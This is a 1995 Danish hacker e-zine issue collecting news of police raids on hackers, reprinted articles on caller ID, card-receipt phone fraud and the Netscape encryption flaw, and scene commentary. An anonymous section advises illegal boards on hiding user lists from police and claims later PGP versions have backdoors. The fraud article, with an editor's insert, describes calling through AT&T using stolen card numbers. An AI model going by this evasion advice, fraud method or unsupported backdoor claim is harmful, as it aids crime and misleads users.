Nyheder, informationer og andet godt, som man burde l‘se

HACKERE BUSTET
----------------
- Darkseed

Pharzyde / 2nd2none (BudBreath/TRoSD) blev busted her forleden morgen, da
de havde hacket sig ind p† AAU-Inet server, i l›bet af de sidste m†neder.
Politiet havde i nogle m†neder aflyttet og log'et alle data-signaler over
telefonen.

S† klokken 7:30 den 22 marts (1995 selvf›lgelig), bankede 3 politim‘nd p‘nt
p† d›ren og havde efter nogle timer konfiskeret alt hardware de overhovedet
kunne finde, inklusiv h›jtalere og HIFI-Udstyr. Blandt hardwaren var flere
Gigabytes software, en del DAT-b†nd og tonsvis af QIC-b†nd. Men, det skal
dog siges at anklagerne mod BudBreath/TRoSD nok kun blive for hacking og
ikke for warez-aktiviteter.

HACKERE ANHOLDT
-----------------
Original Af: Bo Elkj‘r Olsen
[Ekstra-Bladet, 27 Marts 1995]
- Darkseed

Ny razzia mod danske hackere...

Onsdag den 22. marts slog politiet igen til mod de danske hackere. Klokken
7.30 om morgenen blev der banket p† d›rene hos tre hackere i K›benhavn og
i lborg-omr†det. De unge hackere blev taget med til forh›r og deres v‘relser
grundigt ransaget. Alene hos den ene 'Pharzyde' fra lborg-omr†det, blev
der konfiskeret edb-udstyr og programmer 'for over 70.000 kroner'.
De tre anholdte hackere er under mistanke for at have hacket p† rhus
Universitets computere, hvorfra de er s›gt ud p† Internet.
Hackerne har i tre m†neder haft 'superbruger'-status - det vil sige fri
kontrol over universitets-computerne.
- Jeg vidste ikke engang, at det var en superbruger-konto, fort‘ller
'Pharzyde' til Ekstra Bladet.
'Pharzydes' telefon er blevet aflyttet siden begyndelsen af februar, da
politiet kom p† sporet af ham. Politiet er i stand til at aflytte datatrans-
missioner op til en hastighed p† 14.400 baud, det vil sige bogstaver i
sekundet.
'Pharzyde' har kun brugt superbruger-kontoen til at komme ind p† Internet,
hvor han har hentet gratis programmer og spil.
Det var ikke s›ndag muligt at f† en kommentar fra rhus Politi, der st†r for
anholdelserne.

U’RLIGE HACKERE

Sidste gang, politiet slog ned p† den danske hackerscene, udviklede sagen
sig hurtigt til et mareridt for politiet. Hvad der skulle have v‘ret et hurtigt
kirurgisk snit ned gennem den elektroniske kriminalitet, udviklede sig til en
farce, hvor pressen var hurtigere orienteret om anholdelserne end politiet selv.
I december 1993 indledte politiet den razzia, der kaldes Haslev-sagen.
Mens politiet forg‘ves fors›gte at tr‘vle hackmilj›et op, tog hackerne deres
kendskab til medierne til hj‘lpe for at f† nyheden ud hutigst muligt.
Da den fjerde hacker, 'Wedlock', blev anholdt i T†rnby, var Ritzau s† hutigt
orienteret, at Ritzau journalisten J›rgen Juul om anholdelsen - p† trods af,
at det var J›rgen Juul, der havde bemyndiget den.
Haslev-sagen er den hidtil st›rste hackersag i Norden, og ikke mindst derfor
er politiet opsat p† at f† de anholdte d›mt efter anklageskriftet. Efterforsk-
ningen best†ende af kriminalfolk fra Roskilde, to mand fra politiets rejsehold
og tilkaldte, 'civile' edb-eksperter, arbejder p† 16'ende m†ned med at gennem-
g† den datam‘ngde der blev konfiskeret i forbindelse med anholdelserne. Det
drejer sig om mere end en million t‘tskrevne A4-ark.

HACKER-POLITI

Bel‘rt af erfaringerne nedsatte Politiets Efterretningstjeneste i efter†ret
1994 en specialgruppe, der skal tage sig af elektroniske kriminalitet.
Specialgruppen skal f›rst og fremmest besk‘ftige sig med det offentliges
elektroniske sikkerhed, men kan ogs† bist† kriminalpolitiet i efterforskning
af f.eks. hackersager.
Om specialgruppen har v‘ret impliceret i de nye hacker-anholdelser vides ikke,
men 'det kunne ligne en pr›veklud' siger Ekstra Bladets kilde i hackermilj›et.
Selv om der efterh†nden har v‘ret en r‘kke st›rre hackersager i Danmark,
er det stadig meget nemt at hacke.
Efter anholdelserne i december 1993 og januar 1994 var der kortvarigt stille
om hackerne. I dag hackes der igen p† fuld styrke herhjemme.
P† de forskellige edb-systemer bruges der stadig passwords, der er alt for
nemme at g‘tte.
I den aktuelle sag p† rhus Universitet var passwordet til superbruger-
kontoen, der giver ubegr‘nset kontrol over hele universitetscomputeren
'12345678'. Det svarer i datasikkerhed til at have en hovedd›r - komplet med
Ruko-l†s og hele marmeladen - og s† en d›rkarm af v†dt toiletpapir.
Selv om du bruger andre ord, er du stadig ikke garderet mod hackere.
Hackerne har programmer , der kan k›re tusindvis af ord, for eksempel hentet
fra WordPerfects ordbogsfunktion, igennem passwordcheck i l›bet af ganske kort
tid. Derfor skal man ikke v‘lge passwords der best†r af almindelige ord, men
sammens‘tte sit password af tilf‘ldige bogstaver og tal, for eksempel
'P8-tr‘ning' (potte-tr‘ning). Endelig skal man ikke bruge det samme password
p† flere systeme.

------------
Meget kan siges, men hvis det er rigtigt at Pharzyde ikke vidste, at han havde
en superbruger account, s† har han fortjent at blive taget....
- Clive Sharp

R†d til danske sysopper og brugerne af deres systemer
-------------------------------------------------------
Indskrevet af en anonym person
- Darkseed

Da politiet har fulgt Pharzyde og andres linier DATA, og har haft mulighed
for at kunne se alt hvad han lavede p† de forskellige boards, og af rent
sikkerheds m‘ssige grunde, vil jeg give dette r†d til alle sysopper, og brugere
der har adresser/telefon numre liggende p† sin harddisk. Krypter ALLE
filer der indeholder information, s†som adresser og navne p† brugere af
de forskellige 'fy-fy' boards. Skriv telefon numrene og adresser fra
userlisterne ned i en anden fil (krypter den), og slet s† de vitale
informationer fra userlisterne. 1 person kan hurtig blive skyld i en stor
m‘ngde busts (nogen der ›nsker det?), hvis han har s†danne informationer
liggende.

Boards Pharzyde har benyttes sig af de sidste par m†neder, vil jeg r†de til
at holde en mindre pause, og totalt udelukke 'ukendte' new users.

Der er ingen tvivl om at politiet vil efterforske NPD boards n‘rmere, som
de har set Pharzyde (m.fl.?) logge ind p†. De userlister, en lille snot unge
kaldet Junker Jake, udgav for nogen tid siden, er der ingen tvivl om at
politiet har f†et fat i (de har Pharzydes harddisk - Pharzyde havde
listerne)! V‘r ekstra forsigtig, der er ingen grund til at flere boards
bliver lukket, og at flere bliver busted (vi b›r ihvertfald undg† det s†
godt som overhovedet muligt).

Brug Pretty Good Privacy [PGP] (af ‘ldre dato. Versioner nyere end 2.3
har backdoors, og kan ikke stoles p†).

Der er al mulig grund til ikke at f›le sig for sikker!

Dansk PiratLinie Oprettet
---------------------------
- Darkseed
Kilde: JP. Man 3. Apr 1995

P† bedste amerikanske vis f†r Danmark nu ogs† et telefonnummer,
hvor ansatte i en virksomhed eller andre kan ringe op og angive en
arbejdsgiver, en tidligere kammerat eller en bekendt for at bruge
Pirat-kopieret software. Nummeret g†r under betegnelsen Piratlinien
og er oprettet af Business Software Alliance. Piratlinien vil i
Danmark best† af en telefon, der er stillet op hos advokat
Niels M. Andersen hos advokatfirmaet Berning, Schlter og Hald.
De er specialiseret i at jage softwarepirater ...

---------
Jeg f†r snart store klodser af at h›re om Schlter og hans "anti-warez" venner.
Har den mand nogensinde udrettet noget seri›st??? Har han nogensinde bustet
nogen for at have "pirat-warez"??? Manden er et fjols...
- Clive Sharp

Sv‘re tider for hackerne
Af Jan Carlsen, Institut for Datasikkerhed
Kronikken i ComputerWorld nr. 29 - 1. September 1995
- Clive Sharp

"Nu dages det br›dre, det lysner i ›st". S†dan lyder en gammel social-
demokratisk slagsang, som imidlertid ogs† kan benyttes til andre ting. I denne
forbindelse som et glad budskab til de sikkerhedsfolk, der skal beskytte virk-
somhederne, blandt andet mod hackere.
For der er hj‘lp p† vej. Hj‘lpen tager fat om en af v‘senligeste forud-
s‘tninger for at v‘re hacker, nemlig anonymiteten. Uden at kunne v‘re d‘kket af
en anonymitet er der ikke meget sjovt ved at hacke.
T‘nk om en hacker en sen aftentime s‘tter sig ved klaviaturet for et
par timers sjov, hvor vedkommende helt anonymt og naturligvis helt uskyldigt
roder lidt rundt i en af jeres vitale databaser, og derefter lader jer betale
regningen for videreopkald til jeres samarbejdspartner i USA, hvor han da lige
kan ‘ndre et par ordre inden han forts‘tter sin uskyldige fremf‘rd andetsteds
i verden. Alt i alt et sp‘ndende natteprogram, der nok skal kunne b›de lidt p†
manglen p† kendskab til og omgang med det andet k›n [man tror virkeligt at det
er l›gn -red].
Forstil dig s†, at en halv time efter at han har startet sine krimin-
elle handlinger, s† banker det p† d›ren og to grandvoksne politifolk anholder
ham og beslagl‘gger hans udstyr. L‘g s† hertil en straf (stor eller lille) som
han id›mmes, samt et erstatningskrav fra den/de virksomheder, som han har v‘ret
inde hos, s† kan man m†ske fornemme, at det sjove ved hacking er ved at forsvi-
nde.
Dette har hidtil ikke kunnet lade sig g›re, men med digitaliseringen af
centralerne er de tekniske muligheder kommet til stede. Imidlertid har
retsplejeloven sat en stopper for politiets efterforskning gennem aflytning
af telekommunikationen, idet der her kr‘ves mistanke om en forbrydelse med en
straframme p† minimum 6 †r, f›rend en dommer vil give tilladelse til en s†dan
aflytning, og det er naturligvis normalt et godt stykker over den straf en
hacker kan forvente at f†. S† hackeren har hidtil kunne tage det roligt, idet
reglerne om privatlivets fred overfor tredje part ogs† har beskyttet disse
kriminelle. Anderledes er det imidlertid i forholdet mellem den, der ringer op
(B-nummeret) og den der ringes til (A-nummeret). Her er der i princippet ingen
tredje part, og der er ikke lovet noget om hemmeligholdelse overfor den der
ringes til. Hverken registerloven, retsplejeloven eller anden lovgivning/best-
emmelser forhindrer dette.
Det er netop p† dette punkt, at der nu g›res noget for at fjerne anon-
ymiteten af den, der ringer. Det sker ved, at Tele-Danmark senere p† †ret kom-
mer med en ny service, hvor B-nummeret kan afl‘ses af modtageren (A-nummeret).
Det betyder, at modtageren enten kan undlade at besvare opkaldet - eksempelvis
fordi modtageren ikke kender vedkommende eller netop kender vedkommende og ikke
›nsker at tale/kommunikere med denne - eller efterf›lgende kan se, hvorfra det
p†kaldende opkald kom.
Indledningsvis vil der blive tilbudt en relativ simpel enhed til at
s‘tte p† telefonlinien, som afsl›rer nummeret, der kaldes fra. S†danne enheder
kendes allerede idag, men de er baseret p†, at den, der kalder selv skal ind-
taste sit telefonnummer - og det kan man af gode grunde ikke forvente af en
hacker, hvorfor afsendernummeret i fremtiden afsendes automatisk fra centralen.
Senere kommer der mere intelligente enheder, hvori blandt andet kan indkodes
positiv- og negativlister over hvilke numre, man ›nsker/ikke ›nsker at kommuni-
kere med. Endvidere arbejdes der p† at f† etableret en ordning, hvor abonenten
- eventuelt via sin sk‘rm - kan g† ind og se en log over de opkald, der har
v‘ret. Envidere etableres der en s‘rlig ordning for abonnenter med "hemmelige"
numre, med det skal siges, at selv hackere med "hemmeligt" telefonnummer ikke
skal regne med at komme langt i fremtiden.
Selv om denne ordning ikke totalt vil afskaffe hacking, s† er der dog
tale om et mile-skridt i den rigtige retning, og der er ingen tvivl om, at der
vil blive tale om v‘sentlige samfundsbesparelser, for ikke at forglemme en v‘s-
entlig bedre kommunikationssikkerhed i mange virksomheder, lettere mulighed for
at stoppe telefon-terror med mere.
Bedst af alt er imidlertid, at ordningen ogs† begr‘nser de unge menne-
skers mulighed for at blive s† rutinerede hackere, at deres fremtidige l›bebane
fastl†ses til at v‘re af kriminel art.
----------
Jeg kunne komme med kritik af denne artikel fra Jan Carlsen, men det ville
fylde mere, end artiklen selv... Jeg har dog et sp›rgsm†l til Jan:
I USA har de haft disse funktioner i mange †r, har det afskaffet hacking i USA?

Hackere ringer verden rundt p† andres Visa Dankort
Af Lisbeth Egeskov
Forsiden p† ComputerWorld nr. 27 - 18. August 1995
- Clive Sharp

Nummeret p† en betalingskortkvittering kan misbruges af enhver, der
samler bon'en op fra gulvet i forretningen, til at ringe verden rundt eller
k›be ind p† postordre.
If›lge Computerworlds oplysninger er det ved at vinde indpas i danske
hackerkredse at samle betalingskortkvitteringer op af papirkurven ved betaling-
steder og ad den vej finansiere behovet for lange udlandssamtaler.
N†r man betaler med eller h‘ver penge p† sit kreditkort eller kombiner-
ede kreditkort/Dankort, st†r hele kortnummeret ofte p† bon'en eller kviterin-
gen. Kortnummeret p† kvitteringen fra et betalingskort er nok til at ringe gen-
nem det amerikanske telefonselskab AT&T's calling card servicenummer [som er
80010010, hvis nogen er i tvivl -red]. Nummeret, der betjenes af en computer,
er en moderne udgave af Rigstelefonen. Fra det kan man ringe videre til hele
verden ved hj‘lp af et nummer p† et kort fra de kendte, verdensd‘kkende kredit-
kort.
Voice response-systemet hos AT&T oplyser, at man kan indtaste nummeret
p† sit AT&T calling card eller "any major credit card". Stemmen beder ogs† om
kortets udl›bsdato, men acceptere gerne en fiktiv dato, viser en test af mulig-
hederne. At bede om udl›bsdatoen, som normalt ikke st†r p† kvitteringen, er
tilsyneladende ment som en sikkerhedsforanstaltning.
Man kan misbruge b†de Eurocard og Visa Dankort. Ved en test lykkedes
det med det samme at komme igennem ved hj‘lp af kortnumre fra flere Eurocard
kvitteringer. Per Ladegaard, administrerende direkt›r for Pengeinstitutternes
Betalinge Service, fort‘ller, at hans folk ogs† kom igennem p† Visa Dankort, da
de efter ComputerWorlds henvendelse afpr›vede mulighederne.
Hold ›je med opkr‘vning. Fordi pinkoden p† betalingskortet ikke indg†r
i misbruget, kommer kortindehaveren ikke til at h‘nge p† en ›re af regningen.
Det st†r klart i betalingskortloven. - Men det kr‘ver selvf›lgeligt, at man op-
dager, at ens betalingskortnummer er blevet misbrugt af andre til for eksempel
at ringe verden rundt, siger kontorchef i Forbrugerstyrelsen, Frank Bjerg Mor-
tensen. - Man skal altid kontrollere opkr‘vningerne fra kortselskaberne. De er
en del af sikkerhedssystemet, siger Per Ladegaard, PBS. Det er PBS, der i Dan-
mark administrerer Eurocard og Visa Dankort.
Selv om Forbrugerstyrelsen og PBS er enige om, at forbrugeren ikke h‘f-
ter for misbrug, er de ikke enige om, hvem der s† h‘nger p† regningen. - Det er
kortudstederen, der h‘fter. Det er denne ansvar, at kortnumre ikke kan mis-
bruges. For kortnumre er ikke hemmelige, og det m† ikke komme brugeren til
skade at smide en kvittering i papirkurven, siger Frank Bjerg Mortensen.
- Problemet ligger ikke hos os, men hos AT&T. Det er dem, der er service-
udbyder. Deres kontrolsystem er tilsyneladende ikke godt nok, n†r det ikke af-
viser en falsk udl›bsdato, siger Per Ladegaard. Han siger, at PBS vil tage
sagen op med AT&T via de internationale kanaler, men at det godt kan tage nogen
tid, f›r problemet bliver l›st. Det er ikke lykkedes at f† en kommenter fra
AT&T.
Problemet med misbrug af kreditkort er dog ikke s† stort, som det
bliver gjort til, mener administrerende direkt›r Per Ladegaard, PBS. - Vores
opg›relser viser, at tendensen til tab p† grund af misbrug b†de af Dankort og
kreditkort er faldende, siger Per Ladegaard, som understreger, at PBS ikke
sl‘kker p† sikkerheden af den grund.
--------------
AT&T havde samme service i slutningen af 1980'erne, og det voldte den s† store
problemer, at de m†tte lukke den service (til en vis grad), og s† gen†bner man
den service igen, UDEN at forbedre sin sikkerhed! Hvor smart er man s†???

Se hackerens telefonnummer
Af Pia Lykke Andersen
ComputerWorld nr. 30 - 8. September 1995
- Clive Sharp

I l›bet af et halvt †r vil TeleDanmark tilbyde de f›rste kunder mulig-
heden for at se p† telefonen, hvilket nummer der ringes fra.

Mange edb-afdelinger har pr›vet det: En hacker er i nattens l›b tr‘ngt
ind i systemerne og har hentet informationer i virksomheden eller brugt tele-
fonsystemet til at ringe videre ud i verden. Til stor irritation for de fleste
der har haft ubudte g‘ster via telefonnettet, er det ikke muligt at f† oplyst,
hvem der har ringet til virksomheden. L›sningen hedder A-nummeroverf›rsel, og
det kan i princippet godt lade sig g›re. Flere at vore nabolande har inf›rt
det, men det er ikke tilladt i Danmark. Men der er h†b forude for edb-afdeli-
nger og andre der bliver udsat for ubehagelige opringninger. I n‘r fremtid
bliver de en bekymring mindre. En arbejdsgruppe i TeleDanmark unders›ger i ›je-
blikket, hvordan, og i hvilken takt, A-nummeroverf›rsel kan indf›res herhjemme.

Centraler ‘ndres.
I l›bet af det n‘ste halve †r, begynder TeleDanmark at tilbyde A-
nummeroverf›rsel i en r‘kke testomr†der i Danmark. Den nye service bliver sand-
synligt lansd‘kkende i l›bet af et par †r. At A-nummeroverf›rsel ikke er til-
ladt i Danmark skyldes hensynet til de abonnenter, som ›nsker hemmeligt nummer.
Men ved fremtidens A-nummeroverf›rsel vil de hemmelige telefonnumre kunne for-
blive hemmelige. Enten ved at software p† den digitale telefoncentral registr-
erer, at det hemmeligt nummer ikke skal f›res videre til modtageren af sam-
talen, eller ved, at den, der ringer op programmere sin telefon til ikke at op-
lyse, hvem man er. Tilsvarende kan modtageren af samtaler programmere sin tele-
fon til at afvise anonyme opkald. De digitale telefoncentraler er ikke program-
merede til A-nummeroverf›rsel, men deres software kan konfigureres til den nye
service. Sandsynligvis bliver omkring 300.000 abonnenter, som h›rer til p† en
digital AXE-telefoncentral i S›nderjylland og p† Fyn, de f›rste, der kan tage
A-nummeroverf›rsel i brug. Endnu har ETSI (det europ‘iske telestandardiserings-
organ) ikke udsendt en international standard for overf›rsel af A-numre i tele-
fonnettet, og den er heller ikke lige p† trapperne. Derfor v‘lger operat›rerne
selv, hvilken metode de finder bedst til den nye service. Den nye service
betyder ogs†, at der vil komme nye telefoner p† markedet. N†r A-nummerover-
f›rsel bliver aktuel i Danmark, vil TeleDanmark samtidigt markedsf›re et disp-
lay, som kan kobles til telefonen. Det kan vise, hvor der ringes fra. Prisen
bliver sandsynligvis er par hundrede kroner.

ISDN til ISDN.
Enhver regel bekr‘ftes som bekendt af undtagelsen. Ogs† den om det
forbudte A-nummer. Danske abonnenter med ISDN-forbindelser kan nemmeligt aller-
ede se hinandens telefonnumre p† telefonens display, hvis begge parter ›nsker
det.

Sikkerhedshul i Netscape
Af Pia Lykke Andersen
ComputerWorld nr. 30 - 8. September 1995

To studerende har g‘ttet sig frem til krypteringskoden p† Netscape, det
mest benyttede software til WWW p† Internet.

Sent s›ndag aften sendte to californiske studerende, Ian goldberg og
David Wagner, en besked ud p† Internet, som har vakt en del opsigt: P† blot to
dage var det lykkedes dem at finde et svagt hul i Netscape og skrive software,
som p† mindre end et minut g›r det muligt at bryde krypteringskoden til Net-
scape.

Sikkerheden p† Netscape skabes ved brug af s†kaldt symmetrisk n›gle-
kryptografi. N›glen best†r af en matematisk formel s† lang, at den er umulig
for hackere at bryde. Men det tilf‘ldige tal, som skaber den krypterede n›gle,
var nemt for de to studerende at g‘tte sig frem til. - Netscapes software er
ikke s† godt, som folk troede, hvilket sandsynligvis er v‘rre, end ingen
sikkerhed, da folk f†r falsk tryghed, n†r de sender betalingsdetaljer over Int-
ernet, sagde Jan Goldberg tidligere p† ugen til Wall Street Journal.

If›lge samme avis lykkedes samme man›vre allerede for en m†ned siden
for en fransk studerende. Netscape Navigator er det mest brugte redskab til at
finde rundt p† den grafiske del af Internet, World Wide Web, hvor man blandt
andet kan g† p† indk›b i virtuelle forretninger, og hvor man m† opgive sit
kreditkortnummer for at f† varen leveret. hidtil er det blevet betragtet som
ganske sikkert, at opgive kreditkortnumre og sende andre f›lsomme oplysninger
over Internet [!!!].

Hullet kan lappes.
Netscape benyttes i dag af flere end otte milioner mennesker. At den
nyopdagede svaghed i Netscape Navigator faktisk er en realitet, bekr‘ftes af
Netscape-selskabet. I en meddelelse p† Internet forklarer firmaet selv pro-
blemet. - Netscape vil hurtigst muligt sende opdateret software p† Internet,
hvorfra brugerne kan downloade det. En opdateret version af Netscape Navigator
1.1 til Mac OS, Unix og af Netscape Navigator 1.2 til Windows 3.1 og Windows 95
vil kunne downloades af eksisterende brugere af Internet i n‘ste uge. Desuden
vil version 2.0 af Netscape Navigator, som kommer i beta-versioner i n‘ste uge,
ogs† indeholde dette supplement s†vel som et antal yderligere sikkerheds-
foranstaltninger, lyder det i budskabet fra Netscape.

Virksomheden Netscape, som blev stiftet sidste †r, hentede i april
m†ned 17 millioner dollars til huse ved at s‘lge 11 procent af aktierne i sel-
skabet. Bland andet k›bte ComputerWorlds moderselskab, IDG, en andel p† to pro-
cent. I august m†ned gik Netscape p† Nasdaq-b›rsen med salg af 3,5 millioner
aktier til priser mellem 12 og 14 dollars, og firmaet betegnes som et af de
mest interessante foretagender i Internet-software industrien.

ENDEX